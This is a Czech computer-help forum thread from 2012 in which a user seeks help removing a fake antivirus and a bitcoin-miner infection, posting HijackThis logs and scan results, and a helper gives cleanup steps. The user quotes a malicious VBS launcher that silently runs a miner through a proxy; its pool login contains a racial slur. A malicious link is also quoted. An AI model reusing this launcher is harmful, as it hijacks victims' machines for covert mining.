Prosim o kontrolu pc

yeewf7 · Příspěvekod **yeewf7** » 26 srp 2012 03:28

Ahoj, prosim o prekontrolování pc po virech. Je to uz mesic, driv nebyl poradne cas na to...viz obrazky dole. Žádne problémy nejsou, jen se mi zdá, ze se stránky načítaj porad nak pomalu, tak nevim, jesi se mi podarilo vymáznout vsechno. Co s temi viry v karantenach, smazat? Díky.

► Zobrazit spoiler

( Naběhla mi tabulka, kde po mě chteli restart pc pro dokonceni rozbaleni nejakeho rar archivu, s koncovku .exe (žádný rary nestahuju). Zavřela jsem to a spustila MBAM a neco odchytl, (av uz dosla licence..). Hned na druhy den se ale objevil fake AV Live Security Platinum. Vše zablokoval, změnil domovskou stranku IE na http://www.premierarticles.info a vypnul aut. aktualizace win. Pak jsem zkousela vsechno mozne, protoze Mbam uz nic nenasel ani pri uplny kontrole.

Zpětně jsem podle historie procházení a stahování a meilu zjistila, že to bylo z odkazu, který mi dala na zed facebooku jedna kamarádka (ne ona, ale její zavirovaný pc....). Když mi někdo něco dá na zed, přijde mi mail, no a já klikla že co jako mi to tam dáva za fotky???

:( ...
(„angela merkel fvvmwx http://dominofotosa.net/viewfoto.php?ref=pictures&w=ntcpe&resource=google&i=Ester\u010eur\u010dov\u00e1 :* “)

Tak matně si pamatuju, že na tý stránce nic nebylo, jen psali, ze je rozbita. Měla jsem NIS 2012 zk. ver. a nic nehlásil, jen bylo divný, ze se musím pokaždem zapnuti pc ručně připojit k síti.Tu adresu jsem dala proverit na Norton Safe Web a oznacil ji jako bezpecnou, tak jsem to dál neresila. Až pak pri čištění pc jsem nasla nějaky "obrázek"(IMG_22362473515562104-IMG-www.facebook.com.exe), po kliknutí problikla černá tabulka a nic, tak jsem to vyhodila. Vubec mi v tý chvili nedoslo, ze to patrilo k tý stránce z fb.....a taky obrazek s exe ze jo

DD...)

Tohle nikdo nenasel, muzu vyhodit? C:\document and settings\Ester\live.vbs
//tam je todle:
Set ShellWSH = WScript.CreateObject("WScript.Shell")
MSG_String = "mine.exe -o http://Parabola_ATi:nigger1234@mine3.btcguild.com:8332 -t 2 -x socks=70.38.21.29:1866"
Ret = ShellWSH.Run (MSG_String,0,False) //

Jeste dve otazky:
co ze je ten Bitcoinminer od UfaSoft? Naka hra na penize ci co?

je toho plnej net ale nevyznam se v tom...
kdyz se ten vir jmenuje .bot, znamena to, že muj pc měl být zapojen v nakym tom botnetu? ...

2/ Cure it! 16.7.2012
autorun.inf;d:;Pravděpodobně Win32.HLLW.Autoruner.corrupted;Nevyléčitelný.Přesunut.;
winsoft.exe;C:\WINDOWS\temp;Trojan.Fakealert.32460;Smazán.;
A0025951.exe;C:\System Volume Information\_restore{F1A17B0A-663B-44F0-B7FF-6EE3138D3826}\RP175;Trojan.Damaged.1;Smazán.;
A0025952.exe;C:\System Volume Information\_restore{F1A17B0A-663B-44F0-B7FF-6EE3138D3826}\RP175;Trojan.Damaged.1;Smazán.;
A0026502.exe;C:\System Volume Information\_restore{F1A17B0A-663B-44F0-B7FF-6EE3138D3826}\RP176;Trojan.Damaged.1;Smazán.;
winrar.exe\mine.exe;C:\WINDOWS\temp\winrar.exe;Tool.BtcMine.26;;
winrar.exe;C:\WINDOWS\temp;V archivu jsou infikované objekty;Přesunut.;

Reklama

yeewf7 · Příspěvekod **yeewf7** » 26 srp 2012 03:30

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 3:09:54, on 26.8.2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\WINDOWS\Explorer.EXE
C:\Acer\Empowering Technology\ePower\ePower_DMC.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Ask.com\Updater\Updater.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Acer\Empowering Technology\Acer.Empowering.Framework.Launcher.exe
C:\Program Files\Evernote\Evernote\EvernoteClipper.exe
C:\Program Files\Stickies\stickies.exe
C:\Program Files\Common Files\soft602\602updsvc\602updsvc.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\Iaantmon.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\Program Files\Google\Update\1.3.21.115\GoogleCrashHandler.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\system32\dllhost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\Ester\Plocha\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.avira.com/?l=dis&o=APN104 ... cale=en_CZ
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Odkazy
R3 - URLSearchHook: UrlSearchHook Class - {00000000-6E41-4FD3-8538-502F5495E5FC} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.7.7227.1100\swg.dll
O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: Ukazatel S-Rank - {EA837F48-5AD1-443E-AE34-FFE03CBF3099} - C:\Program Files\Seznam.cz\core.3.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O3 - Toolbar: Ask Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O4 - HKLM\..\Run: [ePower_DMC] C:\Acer\Empowering Technology\ePower\ePower_DMC.exe
O4 - HKLM\..\Run: [Boot] C:\Acer\Empowering Technology\ePower\Boot.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [ApnUpdater] "C:\Program Files\Ask.com\Updater\Updater.exe"
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Shadow] C:\Program Files\NewTech Infosystems\NTI Shadow\Shadow.exe --minimize
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKUS\S-1-5-21-1871938407-2727508527-3954083314-1010\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe (User 'Dasa')
O4 - HKUS\S-1-5-21-1871938407-2727508527-3954083314-1010\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (User 'Dasa')
O4 - HKUS\S-1-5-21-1871938407-2727508527-3954083314-500\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe (User 'Administrator')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Stickies.lnk = C:\Program Files\Stickies\stickies.exe
O4 - Global Startup: Acer Empowering Technology.lnk = ?
O4 - Global Startup: Evernote Clipper.lnk = ?
O8 - Extra context menu item: Add to Evernote 4.0 - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: ICQ7.7 - {77F665FD-3F60-4B0A-AE14-EC124B7A7FCE} - C:\Program Files\ICQ7.7\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ7.7 - {77F665FD-3F60-4B0A-AE14-EC124B7A7FCE} - C:\Program Files\ICQ7.7\ICQ.exe
O9 - Extra button: @C:\Program Files\Evernote\Evernote\Resource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204 (file missing)
O9 - Extra 'Tools' menuitem: @C:\Program Files\Evernote\Evernote\Resource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204 (file missing)
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O16 - DPF: {672EE252-D813-4F5E-81BB-5DD163DD4FA5} (Active602XMLFiller Control) - https://www.mojedatovaschranka.cz/stati ... ctivex.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microso ... 7808216734
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/s ... wflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{E5EB13B7-6964-469C-B595-E27F5E8665C5}: NameServer = 10.107.4.100,10.107.4.129
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Proces mezipaměti kategorií součástí - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: 602Updater (602XML Updater) - Software602 a.s. - C:\Program Files\Common Files\soft602\602updsvc\602updsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Avira Scheduler (AntiVirSchedulerService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira Realtime Protection (AntiVirService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Avira Web Protection (AntiVirWebService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
O23 - Service: Služba Google Update (gupdate1ca9d1ab21a2990) (gupdate1ca9d1ab21a2990) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: Intel(R) Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files\Intel\Intel Matrix Storage Manager\Iaantmon.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files\Skype\Updater\Updater.exe

--
End of file - 10884 bytes

Příspěvekod **jaro3** » 27 srp 2012 10:21

AV Live Security Platinum.—nejde odinstalovat?

co ze je ten Bitcoinminer od UfaSoft? Naka hra na penize ci co? je toho plnej net ale nevyznam se v tom...
odinstaluj to .

kdyz se ten vir jmenuje .bot, znamena to, že muj pc měl být zapojen v nakym tom botnetu? ..

.

http://filext.com/file-extension/BOT

Zavři ostatní aplikace a prohlížeče, odpoj se od netu a fixni v HJT:
Návod

Kód: Vybrat vše

R3 - URLSearchHook: UrlSearchHook Class - {00000000-6E41-4FD3-8538-502F5495E5FC} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Ask Toolbar BHO - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O3 - Toolbar: Ask Toolbar - {D4027C7F-154A-4066-A1AD-4243D8127440} - C:\Program Files\Ask.com\GenericAskToolbar.dll
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [ApnUpdater] "C:\Program Files\Ask.com\Updater\Updater.exe"
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/s ... wflash.cab

Stáhni si ATF Cleaner
Poklepej na ATF Cleaner.exe, klikni na select all found, poté:
-Když používáš Firefox (Mozzila), klikni na Firefox nahoře a vyber: Select All, poté klikni na Empty Selected.
-Když používáš Operu, klikni nahoře na Operu a vyber: Select All, poté klikni na Empty Selected. Poté klikni na Main (hlavní stránku ) a klikni na Empty Selected.
Po vyčištění klikni na Exit k zavření programu.
ATF-Cleaner je jednoduchý nástroj na odstranění historie z webového prohlížeče. Program dokáže odstranit cache, cookies, historii a další stopy po surfování na Internetu. Mezi podporované prohlížeče patří Internet Explorer, Firefox a Opera. Aplikace navíc umí odstranit dočasné soubory Windows, vysypat koš atd.

Stáhni si TFC
Otevři soubor a zavři všechny ostatní okna, Klikni na Start k zahájení procesu. Program by neměl trvat dlouho.
Poté by se měl PC restartovat, pokud ne , proveď sám.

Stáhni si TDSSKiller
Na svojí plochu.Ujisti se , že máš zavřeny všechny ostatní aplikace a prohlížeče. Rozbal soubor a spusť TDSSKiller.exe. Restartuj PC . Log z TDSSKilleru najdeš zde:
C:\TDSSKiller.2.2.7.1._(datum)_log.txt , vlož sem prosím celý obsah logu.

Vypni rez. ochranu u antiviru a antispywaru,příp. firewall..

Stáhni si ComboFix (by sUBs)
a ulož si ho na plochu.
Ukonči všechna aktivní okna a spusť ho.
- Po spuštění se zobrazí podmínky užití, potvrď je stiskem tlačítka Ano
- Dále postupuj dle pokynů, během aplikování ComboFixu neklikej do zobrazujícího se okna
- Po dokončení skenování by měl program vytvořit log - C:\ComboFix.txt - zkopíruj sem prosím celý jeho obsah
Pokud budou problémy , spusť ho v nouz. režimu.

Upozornění : Může se stát, že po aplikaci Combofixu a restartu počítače, Windows nenaběhnou , nebo nenajede plocha , budou problémy s připojením, pak znovu restartuj počítač, pokud to nepomůže , po restartu mačkej klávesu F8 a pak zvol poslední známou funkční konfiguraci. , či použij bod obnovy.

yeewf7 · Příspěvekod **yeewf7** » 29 srp 2012 08:45

AV Live Security Platinum.—nejde odinstalovat?

a ono to tam teda jeste nekde je? Nešlo, bylo to jako hra na schovku....Nakonec jsem ho vyhledala z jeho zástupce na ploše, ve Vlastnostech jsem našla cestu Cíle (C:\Documents and Settings\All User\Data aplikaci\a strasne dlouhej nazev sami nesmyslny cisla a pismena) a hodila vsechno co se mi tam nelibilo do Koše.
Jakejkoliv program spustit nešlo, ale otevirat složky jo...pak už šel ten mbam...

co ze je ten Bitcoinminer od UfaSoft? Naka hra na penize ci co? je toho plnej net ale nevyznam se v tom...
odinstaluj to .

Eset online scanner:(16.7.2012)
C:\mine.exe a variant of Win32/BitCoinMiner.A application
C:\WINDOWS\temp\winrar.exe a variant of Win32/BitCoinMiner.A application
C:\WINDOWS\temp\winsoft.exe a variant of Win32/Kryptik.AIEV trojan
Právěže mě zmátlo, že ty soubory jsou viry, ale byly dokonce i podepsany vydavatelem (Ufasoft), ale nevim jak se sem ten program dostal, proto mě zajímalo o co jde. No ted uz trochu vim co ten bit coin je http://bitcoins.sk/media, tak mam právě takový tušení, že si asi někdo udělal botnet sit pocitaců, propašuje jim tam tenhle program a pak na nich vydělává ty bitcoiny, aniž by to tom oni věděli... Asi jo co?

kdyz se ten vir jmenuje .bot, znamena to, že muj pc měl být zapojen v nakym tom botnetu? ..
.
http://filext.com/file-extension/BOT

ale né soubory s příponou .bot, myslela jsem název toho viru backdoor.bot, co to znamena, co má za úkol provádět v napadenych pc mě zajímalo....právě že občas používám bankovnictví online, tak tady nechci mít žádnyho špiona....

----------------------------------------------------------------------------------
ATF- nakych 300 MB...jenom win, opera+FF nemam..
TFC-dalších 400 MB bordelu...
předtím ještě CC přes 350MB...
-----------------------------------

tak ty logy:
novy HJT:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 5:32:25, on 28.8.2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\Program Files\Common Files\soft602\602updsvc\602updsvc.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\Iaantmon.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\Program Files\Google\Update\1.3.21.115\GoogleCrashHandler.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\Explorer.EXE
C:\Acer\Empowering Technology\ePower\ePower_DMC.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Acer\Empowering Technology\Acer.Empowering.Framework.Launcher.exe
C:\Program Files\Evernote\Evernote\EvernoteClipper.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\Documents and Settings\Ester\Plocha\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.avira.com/?l=dis&o=APN104 ... cale=en_CZ
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Odkazy
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.7.7529.1424\swg.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: Ukazatel S-Rank - {EA837F48-5AD1-443E-AE34-FFE03CBF3099} - C:\Program Files\Seznam.cz\core.3.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O4 - HKLM\..\Run: [ePower_DMC] C:\Acer\Empowering Technology\ePower\ePower_DMC.exe
O4 - HKLM\..\Run: [Boot] C:\Acer\Empowering Technology\ePower\Boot.exe
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Shadow] C:\Program Files\NewTech Infosystems\NTI Shadow\Shadow.exe --minimize
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKUS\S-1-5-21-1871938407-2727508527-3954083314-1009\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe (User 'já')
O4 - HKUS\S-1-5-21-1871938407-2727508527-3954083314-1009\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (User 'já')
O4 - HKUS\S-1-5-21-1871938407-2727508527-3954083314-1010\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe (User 'Dasa')
O4 - HKUS\S-1-5-21-1871938407-2727508527-3954083314-500\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe (User 'Administrator')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Stickies.lnk = C:\Program Files\Stickies\stickies.exe
O4 - Global Startup: Acer Empowering Technology.lnk = ?
O4 - Global Startup: Evernote Clipper.lnk = ?
O8 - Extra context menu item: Add to Evernote 4.0 - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: ICQ7.7 - {77F665FD-3F60-4B0A-AE14-EC124B7A7FCE} - C:\Program Files\ICQ7.7\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ7.7 - {77F665FD-3F60-4B0A-AE14-EC124B7A7FCE} - C:\Program Files\ICQ7.7\ICQ.exe
O9 - Extra button: @C:\Program Files\Evernote\Evernote\Resource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204 (file missing)
O9 - Extra 'Tools' menuitem: @C:\Program Files\Evernote\Evernote\Resource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204 (file missing)
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O16 - DPF: {672EE252-D813-4F5E-81BB-5DD163DD4FA5} (Active602XMLFiller Control) - https://www.mojedatovaschranka.cz/stati ... ctivex.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microso ... 7808216734
O17 - HKLM\System\CCS\Services\Tcpip\..\{E5EB13B7-6964-469C-B595-E27F5E8665C5}: NameServer = 10.107.4.100,10.107.4.129
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Proces mezipaměti kategorií součástí - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: 602Updater (602XML Updater) - Software602 a.s. - C:\Program Files\Common Files\soft602\602updsvc\602updsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Avira Scheduler (AntiVirSchedulerService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira Realtime Protection (AntiVirService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Avira Web Protection (AntiVirWebService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
